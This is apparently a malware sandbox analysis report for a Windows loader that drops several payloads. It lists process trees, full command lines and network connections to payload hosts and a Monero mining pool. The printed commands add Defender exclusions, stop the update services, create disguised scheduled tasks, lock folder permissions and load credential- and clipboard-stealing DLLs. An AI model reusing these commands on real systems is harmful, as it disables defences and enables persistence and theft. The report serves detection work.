PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 540 wrote to memory of 2772 N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 4200 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 568 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 3044 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 4332 wrote to memory of 2204 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2204 wrote to memory of 2036 N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 2772 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
PID 2772 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
PID 3044 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

"C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe"

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

"C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe"

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

"C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe"

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

"C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe"

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

"C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe"

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

"C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

"C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe"

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

"C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp

"C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp" /SL5="$B01BC,491750,408064,C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6fe58538,0x6fe58548,0x6fe58554

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe" --version

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4332 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231004220046" --session-guid=4df762ca-d00d-4038-a583-2029e926e20c --server-tracking-blob=YThjMGRiYjdiNzhlM2E1OTE2ZjZmZDEyNGM5OWQyYzg1ZGMyNzNiOWQ0MTY3ZTM1N2NkNDFkZjdiNWE0NGUzMjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ1NjgzOS41ODk4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxZjEwMjRjZi04ODExLTQzYzAtOTc5My00ZjU0OTViYjcxNzAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4005000000000000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6eba8538,0x6eba8548,0x6eba8554

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

"C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

"C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 808

C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp" /SL5="$A020C,833775,56832,C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x25e8a0,0x25e8b0,0x25e8bc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3594612327.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0694413361.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7004201895.exe"

C:\Users\Admin\AppData\Local\Temp\3594612327.exe

"C:\Users\Admin\AppData\Local\Temp\3594612327.exe"

C:\Users\Admin\AppData\Local\Temp\0694413361.exe

"C:\Users\Admin\AppData\Local\Temp\0694413361.exe"

C:\Users\Admin\AppData\Local\Temp\7004201895.exe

"C:\Users\Admin\AppData\Local\Temp\7004201895.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3360 -ip 3360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1908 -ip 1908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1876

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "s6.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f & erase "C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4752 -ip 4752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 1444

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7004201895.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 121.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 d062.userscloud.net udp
US 104.21.93.225:443 flyawayaero.net tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 85.217.144.143:80 85.217.144.143 tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 188.114.96.0:443 jetpackdelivery.net tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.32.208:443 lycheepanel.info tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 justsafepay.com udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 potatogoose.com udp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download.opera.com udp
US 136.0.77.2:443 link.storjshare.io tcp
NL 82.145.216.24:443 download.opera.com tcp
US 8.8.8.8:53 demo.seafile.com udp
US 8.8.8.8:53 download3.operacdn.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
GB 95.101.143.176:443 download3.operacdn.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 185.26.182.93:443 features.opera-api2.com tcp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 93.182.26.185.in-addr.arpa udp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.96.1:443 m7val1dat0r.info tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 1.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.169.86:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 86.169.219.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
DE 172.217.23.206:80 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 mediasitenews.com udp
US 194.87.32.213:443 mediasitenews.com tcp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 213.32.87.194.in-addr.arpa udp

Files

memory/4516-0-0x0000000000210000-0x000000000026E000-memory.dmp

memory/4516-1-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/4516-2-0x0000000004D20000-0x0000000004DBC000-memory.dmp

memory/4516-3-0x00000000054B0000-0x0000000005A54000-memory.dmp

memory/4516-4-0x0000000005000000-0x0000000005092000-memory.dmp

memory/4516-5-0x0000000004EC0000-0x0000000004ED0000-memory.dmp

memory/4516-6-0x0000000004BD0000-0x0000000004BDA000-memory.dmp

